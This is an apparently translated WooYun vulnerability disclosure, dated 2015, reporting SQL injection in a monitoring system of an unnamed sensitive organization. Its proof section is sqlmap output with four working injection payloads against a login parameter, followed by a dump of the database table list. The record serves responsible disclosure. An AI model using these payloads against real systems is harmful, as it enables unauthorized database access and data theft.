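Vulnerability summary

Bug ID: wooyun-2015-0101208

Title: SQL injection in a network security monitoring system of a sensitive organization in a certain city

Vendor: a sensitive organization in a certain city

Author: YY-2012

Submitted: 2015-03-16 15:05

Fixed: 2015-05-01 14:28

Publicly disclosed: 2015-05-01 14:28

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed over to a third-party partner organization (First Research Institute of the Ministry of Public Security) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]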


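Vulnerability details

Disclosure status:

2015-03-16: Details sent to the vendor; awaiting vendor handling
2015-03-17: Vendor confirmed; details disclosed to the vendor only
2015-03-27: Details disclosed to core white hats and experts in related fields
2015-04-06: Details disclosed to regular white hats
2015-04-16: Details disclosed to intern white hats
2015-05-01: Details disclosed to the public

Brief description:

As the title says.

Detailed description:

Masked region (request details redacted by the platform)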

Proof of vulnerability:


sqlmap identified the following injection points with a total of 27006 HTTP(s) requests:
---
Parameter: name (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: name=-9817' OR 3628=3628#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_=
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: name=-2869' OR 1 GROUP BY CONCAT(0x71716b6a71,(SELECT (CASE WHEN (9179=9179) THEN 1 ELSE 0 END)),0x7162766b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_=
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: name=asd';(SELECT * FROM (SELECT(SLEEP(5)))aQYR)#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_=
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT - comment)
Payload: name=asd' AND (SELECT * FROM (SELECT(SLEEP(5)))dyUO)#&pass=asd&state=1&time=Fri Mar 13 2015 16:19:08 GMT 0800 (??-????????????��?��)&_=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0.11
Database: netalarm
[23 tables]
+---------------------------------------+
| sysuser |
| tbnetalarm |
| tbwsba |
| xk_article |
| xk_channel |
| xk_collection |
| xk_collitem |
| xk_column |
| xk_diss |
| xk_friendlink |
| xk_master |
| xk_photo |
| xk_placard |
| xk_review |
| xk_soft |
| xk_source |
| xk_system |
| xk_templabel |
| xk_template |
| xk_tempproject |
| xk_user |
| xk_usergroup |
| xk_vote |
+---------------------------------------+
Database: information_schema
[16 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: mysql
[17 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+

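Remediation:

Filter

Copyright notice: when reposting, please credit the source YY-2012@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-03-17 14:27

Vendor reply:

The described issue has been verified and confirmed; the owner has been notified to fix it.

Latest status:

None yet


Vulnerability comments:

Comments

  1. 2015-03-16 16:02 | 大漠長河 (Intern white hat | Rank: 43, Vulnerabilities: 7 | Tianlongyuan Scenic Area welcomes you...)

    Looks like it belongs to the public security system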